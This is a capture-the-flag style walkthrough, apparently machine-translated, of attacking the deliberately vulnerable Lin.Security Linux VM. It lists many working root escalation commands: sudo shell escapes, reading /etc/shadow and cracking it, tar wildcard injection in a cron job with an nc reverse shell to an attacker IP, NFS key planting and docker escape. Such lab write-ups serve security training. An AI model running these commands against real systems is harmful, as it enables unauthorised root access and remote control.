[penetration test] Lin.Security target penetration exercise_ Virtual machine cannot obtain ip configuration method + target machine multiple rights raising methods

Target description: in.security, we hope to develop a Linux virtual machine, which is based on the latest Ubuntu distribution (18.04 LTS) when writing this article, but there are many vulnerabilities that make it impossible for users to upgrade and take root in the box. Designed to help understand that some built-in applications and services (if incorrectly configured) can be abused by attackers.
First, you can log in to the host using the following credentials: bob / secret

Download address: https://in.security/downloads/lin.security_v1.0.ova

Environment configuration:

1. Because the security target directly powered on is connected to the NAT, it cannot obtain the ip, so shut down again, press and hold the shift key for the first second of power on, and then press e to enter the configuration interface:

Change ro to   rw signie init=/bin/bash

  2. Press ctrl+X or F10 to restart. After restarting, the network card is ens33:

3. At this time, you need to modify enp0s3 to ens33, apply after modification, and restart:

Ubuntu starts at 16.04, although  / The configuration of fixed IP can also be modified in etc/network/interfaces, but multiple network cards are used   Netplan mode. The configuration file is: / etc/netplan/50-cloud-init.yaml

vim /etc/netplan/50-cloud-init.yaml
netplan apply //Configuration application takes effect

  4. If not, modify the configuration in / etc/network/interfaces:

vim /etc/network/interfaces
 Add two new lines:
auto ens33
iface ens33 inet dhcp

1, Information collection

1. Scan port, open port 22, and perform remote login according to the given account:

nmap -sS -sV -T5 -p- 192.168.225.192
ssh bob@192.168.225.192

2, sudo rights

2. There are many loopholes in the target, so there are many methods to raise the right:

1) General method: sudo -l view the commands that support root privileges

  Many commands can be entered for authorization:

sudo ash
sudo bash
sudo /bin/bash
sudo dash
sudo csh
sudo sh
sudo curl
sudo zsh

  2) socat Rights:

Establish a shell on port 1234 on the server

sudo socat tcp-listen:1234,reuseaddr,fork exec:sh,pty,stderr,setsid,sigint,sane

  Open another window for remote connection and start the local 1234 port LISTEN on the local machine:

socat FILE:`tty`,raw,echo=0 TCP:127.0.0.1:1234

 

Reference article: https://blog.csdn.net/qq_17204441/article/details/89324620

3) awk Rights:

sudo awk 'BEGIN {system("/bin/sh")}'

4) Right of withdrawal:

The ed command is used to start the ed text editor. Use the ed command to access the empty buffer to call the bash/sh shell to raise the right.

sudo ed
!sh

There is a problem here. Exit cannot exit. You need to use w to save and q to exit:

  5) find command authorization:

sudo find . -exec /bin/sh \; -quit

6) env environment variable authorization:

Some applications use functions such as system to call system commands, but instead of using the absolute path, they use the env command to find the environment variables, which may be upgraded by modifying the environment variables

sudo sh -c 'cp $(which env) .; chmod +s ./env'
./env /bin/sh -p

7) less, more and man claim:

sudo less /etc/passwd
!/bin/sh

sudo more /etc/passwd
!/bin/sh

Sudo man man

!/bin/sh

8) expect Rights:

expect is an automated interactive suite, which is mainly used when executing commands and programs. The system requires the input of specified strings in the form of interaction to realize interactive communication.

sudo expect -c "spawn /bin/sh;interact"

9) scp Rights:

TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF"
sudo scp -S $TF x y:
sudo pico
^R^X
reset; sh 1>&0 2>&0

10) ssh authorization:

sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x

11) vi Rights:

sudo vi -c ':!/bin/sh' /dev/null

12) pico Rights:

sudo pico
^R^X
reset; sh 1>&0 2>&0
This operation method: press and hold ctrl+r and ctrl+x on the keyboard, and then execute the following commands. After execution, press and hold ctrl+r and ctrl+x again, and then enter the command to be executed, such as id, and it will be executed with root permission

13) rvim Rights:

sudo rvim -c ':python3 import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

  14) perl Rights:

sudo perl -e 'exec "/bin/sh";'

14) tclsh Rights:

Tcl is a scripting language and a string based command language

sudo tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr

  15) git Rights:

sudo git -p help config
!/bin/sh

  16) Right of withdrawal:

sudo script -q /dev/null

3, Password information collection and authorization

hash burst:

1. If you check / etc/passwd, you can find something like root:x:0:0:root:/root:/bin/bash. In this case, x means that the password hash of the user is stored in / etc/shadow

2. Try to blow up the password of insecurity: (the dictionary is in usr/share/wordlists/rockyou.txt of kali)

hashcat AzER3pBZh6WZE -m 1500 rockyou.txt

john blasting:

1. Query suid authorization raising command:

find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;

xxd right raising:

The xxd command can make a hexadecimal output for a given standard input or file, and it can also convert the hexadecimal output to the original binary format. When suid is used together with execution permission, it will cause authorization lifting

1. First view the group information and find that user susan belongs to itservices user group:

cat /etc/group | grep itservices

2. Use the super user to view the hidden file, find the secret under susan's account, view it, and get the password:

find / -name ".*" -type f -path "/home/*" -exec ls -al {} \;

 

3. Use MySuperS3cretValue! Log in to the susan account with the password and use the xxd command to read the / etc/shadow file:

xxd "/etc/shadow" | xxd -r

4. Copy the user and password into the document, and use the john command to blow up the password:

john --wordlist=/usr/share/wordlists/rockyou.txt pass

taskset authorization:

taskset 1 /bin/bash -p

4, Scheduled task cron authorization:

1. Generate a rebound shell payload on kali:

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.225.133 lport=1234 R

2. Write the payload to the sh file of the scheduled task:

echo "mkfifo /tmp/jagoff; nc 192.168.225.133 1234 0</tmp/jagoff | /bin/sh >/tmp/jagoff 2>&1; rm /tmp/jagoff" > shell.sh && chmod +x shell.sh
echo "" > "–checkpoint-action=exec=sh shell.sh"  //Inject a flag that specifies the checkpoint action
echo "" > --checkpoint=1 //Inject a flag to specify our checkpoint

3. Open another window, log in remotely again, listen, and bounce the shell successfully

5, NFS Rights:

  1. When scanning the port, it is found that NFS port is open: 2049. View the mounting location:

showmount -e 192.168.225.192

2. Mount:

mount -t nfs 192.168.225.192:/home/peter /tmp/ 

When you see root, you can directly access the root directory, but you can't copy files directly to the network shared directory.

3. The principle is: mount the NFS share on Kali, create a new user with the same uid/gid as the export (1001 / 1005), and then log in to the user to write the export file

groupadd -g 1005 peter
adduser peter -uid 1001 -gid 1005
ls -al /tmp

4. Switch the peter user, create an ssh key to connect, and access / home/peter on Lin.security:

ssh-keygen

5. Because the file can be written, the ID_ Copy rsa.pub content to authorized_keys, and then put them in the mounted directory, 644 or 600

cat id_rsa.pub > /tmp/authorized_keys
chmod 700 ../.ssh/
chmod 600 chmod 600 authorized_keys

6. Remote connection:

ssh -i id_rsa peter@192.168.225.192

  7. After successful connection, use strace to claim:

strace can track the system call generated by a process, including parameters, return value and execution time.

sudo strace -o /dev/null /bin/sh

Or docker group rights:

docker run -v /:/hostOS -i -t chrisfosterelli/rootplease

Tags: penetration test

Posted on Mon, 06 Sep 2021 16:56:28 -0400 by moriman